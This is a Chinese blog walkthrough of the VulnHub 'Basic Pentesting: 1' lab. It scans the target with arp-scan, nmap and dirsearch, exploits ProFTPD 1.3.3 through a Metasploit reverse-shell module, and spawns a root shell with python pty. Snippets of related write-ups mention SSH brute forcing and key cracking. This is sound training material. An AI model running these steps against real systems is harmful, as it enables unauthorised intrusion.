Basic Pentesting: 1

最新推荐文章于 2024-09-27 18:22:55 发布
最新推荐文章于 2024-09-27 18:22:55 发布
阅读量190 收藏 1
点赞数 5
文章标签: 网络安全
本文链接:https://blog.csdn.net/m0_73124588/article/details/142577444
版权

靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/#download

信息收集

扫描靶机的 ip 地址

arp-scan -l

kali:192.168.85.128

靶机:192.168.85.169

扫描靶机端口

nmap -p- -A 192.168.85.169

看到开放了 21,22,80 端口

先访问 80 端口

没看到什么有用的信息,开始扫描靶机的目录信息

dirsearch -u http://192.168.85.169

没扫到有用的信息

漏洞利用+提权

前面有一个 21 ftp 端口,版本为 proftpd 1.3.3

使用 msfconsole 找寻给版本的相关漏洞

search proftpd 1.3.3

看到 2 是符合版本的

use 2

show options

查看一下需要修改的参数

修改 rhosts 为靶机的 ip

设置反向连接

再用 show options 查看一下需要修改的参数

设置 lhosts 为攻击机的 ip(kali ip)

还有监听的端口(可以不改)

所有的都设置好后,运行

run

获取交互式 shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

发现是 root 用户

Inviewp
关注
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 827
靶场提权
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
weixin_52487093的博客
08-05 233
BASIC PENTESTING: 1打靶渗透【附代码】(权限提升)
Basic Pentesting: 1复现
weixin_61982677的博客
09-27 191
靶机初始网络模式为桥接模式,需要先更改硬件兼容性,下调一个版本,然后在修改网络模式为 NAT 模式,使靶机与 kali 在同一网段下。回想端口扫描 ftp 服务版本,可能有漏洞,利用 msfconsole。开放了 3 个端口 ftp21 ssh22 http80。kali(攻击机):192.168.198.129。靶机:192.168.198.190。成功,直接获得 root 权限。访问 http80 端口。
Vulnhub靶机:Basic Pentesting: 1
whoami
09-26 410
Vulnhub靶机:Basic Pentesting: 1实战
【vulnhub】Basic Pentesting :2靶机
wbplife的博客
08-06 412
445端口:靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,发现两个用户名:kay、jan。发现/home/kay/目录存在pass.bak文件,但目前我们没有访问权限;发现可以访问kay用户的ssh私钥文件。通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。根据之前的提示,使用hydra工具爆破jan用户的ssh密码,得到:jan:armando。需要输入密码,输入上面pass.bak里的试一下,发现成功。查看pass.bak文件。
Basic Pentesting:2-打靶渗透【附代码】(权限提升)
weixin_52487093的博客
08-09 742
Basic Pentesting:2-打靶渗透【附代码】(权限提升) #python私钥破解#445SMB端口信息枚举利用
Basic Pentesting:2靶机
m0_65285254的博客
08-08 278
通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。靶机开放了445端口,可以使用enum4linux工具枚举smb服务的信息,开放22、80、139、445、8009、8080 端口。使用hydra工具爆破jan用户的ssh密码。sudo -l查看一下具有sudo权限的程序。需要密码 是pass.bak 的内容。查看 /home/key 下的文件。可以访问kay用户的ssh私钥文件。查看pass.bak文件。主机发现 查看开放端口。得到 armando。
Basic Pentesting: 2靶机
weixin_73074638的博客
08-10 292
得到可能为密码的值heresareallystrongpasswordthatfollowsthepasswordpolicy$$通过ssh2john转换id_rsa为可以识别的信息,然后利用字典解密该信息,来获取文件密码。得到两个用户分别是 kay 、 jan对应的就是k用户和j用户。因为端口扫描ssh服务开启,j用户存在弱口令,尝试用九头蛇爆破。cat pass.bak,拒绝访问。得到密码beeswax再次尝试连接。拼接/development/再次查看pass.bak文件。得到密码为armando。
[Vulnhub] basic_pentesting_1
weixin_63231007的博客
07-01 679
靶机:192.168.236.133 访问试试,没有得到可用信息。 获得了ftp服务的版本,想搜索一下该版本是否有可利用的漏洞的话,可用msfconsole 发现了一个该版本可利用漏洞 使用use命令,输入序号即可,0 进入该漏洞 exploitshow options 看一下参数,一个是RHOSTS 一个是RPORT 通过set命令来设置一下地址和端口,set RHOSTS 192.168.236.133下一步设置payload:set payload cmd/unix/reverse 这个是反向连接的
basic_pentesting1靶机
qq_68865419的博客
10-19 277
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到... 在ssh服务器中,使用与John一起
tryhackme-writeups:可在TryHackMe.com上获得有关ROOMS的文章
03-09
TryHackMe撰写 是一个免费的在线平台,可通过您的浏览器使用动手练习和实验来学习网络安全! 客房 姓名 困难 简单 简单 简单 简单 中等的 简单 简单 简单 简单 中等的 中等的
大量的备忘单:我大量的备忘单(编码,备忘,引脚排列,命令列表等)的一部分
01-30
1. **编程语言**: - **JavaScript**: 一种广泛用于网页和应用开发的脚本语言,尤其在客户端编程中不可或缺。备忘单可能包含变量声明、函数、对象、DOM操作、事件处理等内容。 - **Python**: 强大的解释型语言,常...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8508
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大棚蔬菜种植基地建设项目可行性研究报告.doc
10-19
大棚蔬菜种植基地建设项目可行性研究报告.doc
RPG Maker MZ 插件教程
10-19
自己英文素质太差,看不懂,所以把Plugin Tutorial for RPG Maker MZ翻译了一下,通过网上翻译,翻译的不好,但基本能够看得懂。 作为自己在学习过程中的笔记,供感兴趣的兄弟姐妹一起学习。 本人自己感到这这篇文章对于初学者来说帮助很大,比较简单易懂。
PuLP-1.6.9-cp35-cp35m-win_amd64.whl
10-19
PuLP-1.6.9-cp35-cp35m-win_amd64.whl
【高创新】基于人工蜂鸟优化算法AHA-CNN-LSTM-Attention的用客流量预测算法研究Matlab实现.rar
最新发布
10-20
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
SSM-多人命题系统.zip
10-19
多人命题系统是高校为教师、学生试卷的重要组成部分,是实现人才培养目标、培养学生科研能力与创新思维、检验学生综合素质与实践能力的重要手段与综合性实践教学环节。我所在学院多采用半手工管理学生试卷的方式,所以有必要开发多人命题系统来对学生成绩档案进行数字化管理。既可减轻学院教职员工工作压力,比较系统地对试卷提高信息、试卷批改信息、错题信息上的各项服务进行管理,又可加快错题信息查询速度、加强试卷批改管理,跟上国家各部门关于信息化的步伐,使各项管理更加规范化。 多人命题系统主要的模块包括查看;管理员;首页、个人中心、学生管理、教师管理、学校公告管理、命题信息管理、聊天信息管理、试题信息管理、试卷提高管理、试卷批改管理、错题信息管理、论坛管理、系统管理。教师权限;首页、个人中心、命题信息管理、聊天信息管理、试题信息管理、试卷提高管理、试卷批改管理、错题信息管理。学生权限:首页、个人中心、试卷提高管理、试卷批改管理、错题信息管理、论坛管理等功能。系统中管理员主要是为了安全有效地存储和管理各类信息,还可以对系统进行管理与更新维护等操作,并且对后台有相应的操作权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值